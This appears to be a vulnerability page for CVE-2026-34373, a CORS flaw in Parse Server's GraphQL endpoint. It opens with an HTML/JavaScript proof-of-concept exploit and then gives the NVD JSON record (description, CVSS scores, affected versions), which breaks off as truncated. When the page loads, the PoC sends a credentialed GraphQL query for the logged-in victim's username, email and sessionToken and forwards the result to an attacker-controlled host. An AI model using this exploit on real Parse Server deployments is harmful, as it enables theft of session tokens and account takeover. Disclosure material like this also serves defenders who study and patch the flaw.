CVE-2026-34373

<!-- Proof of Concept for CVE-2026-34373 --> <!-- Save this as an HTML file and host it on a different domain than the target --> <html> <body> <script> // Target Parse Server GraphQL endpoint (Replace with actual target) const targetUrl = 'https://target-parse-server.com/graphql'; // Malicious GraphQL query to extract sensitive user data const query = ` query { viewer { id username email sessionToken } } `; // Function to exploit the CORS misconfiguration function exploit() { fetch(targetUrl, { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ query }), credentials: 'include' // Includes cookies if the victim is logged in }) .then(response => response.json()) .then(data => { console.log('Exploit successful, data leaked:', data); // Send stolen data to attacker's controlled server fetch('https://attacker-controlled-server.com/log?q=' + encodeURIComponent(JSON.stringify(data))); }) .catch(error => console.error('Exploit failed:', error)); } // Trigger the exploit automatically exploit(); </script> <p>CVE-2026-34373 PoC: Check console for exfiltrated data.</p> </body> </html>

{"cve": {"id": "CVE-2026-34373", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:19.060", "lastModified": "2026-04-02T18:40:32.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.66 and 9.7.0-alpha.10, the GraphQL API endpoint does not respect the allowOrigin server option and unconditionally allows cross-origin requests from any website. This bypasses origin restrictions that operators configure to control which websites can interact with the Parse Server API. The REST API correctly enforces the configured allowOrigin restriction. This issue has been patched in versions 8.6.66 and 9.7.0-alpha.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "8.6.66", "matchCriteriaId": "B9D9F93E-984B-441E-97C2-5A46A2A14419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.7.0", "matchCriteriaId": "E3DFF698-B3EE-4DCA-BAF3-9BE52F0F77D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "3A140D3A-AECC-4CA1-958C-3CA53E313B27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha2:*:*:*:node.js:*:*", "matchCriteriaId": "BEDAEFBC-DA77-4998-BDD6-A139E15E5CC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha3:*:*:*:node.js:*:*", "matchCriteriaId": "8C9E59AF-3B82-4D61-847B-A18E7DDF7A34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha4:*:*:*:node.js:*:*", "matchCriteriaId": "2AB743CC-D168-4313-A5AA-43CF76D178E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha5:*:*:*:node.js:*:*", "matchCriteriaId": "C351C736-AB91-4985-A0B4-43B120F5E5C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha6:*:*:*:node.js:*:*", "matchCriteriaId": "F02797C9-E67D-4BF4-BB56-8D6DA9178322"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha7:*:*:*:node.js:*:*", "matchCriteriaId": "B059E381-D0F6-4425-92C0-167486379A98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha8:*:*:*:node.js:*:*", "matchCriteriaId": "98C19734-3607-467D-9677-10A1909A8D8D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.7.0:alpha9:*:*:*:node.js:*:*", "matchCriteriaId": "F55001C0-EDDA-45D9-ABA4-CFF0489C9C01"}]}]}], "ref ... (truncated)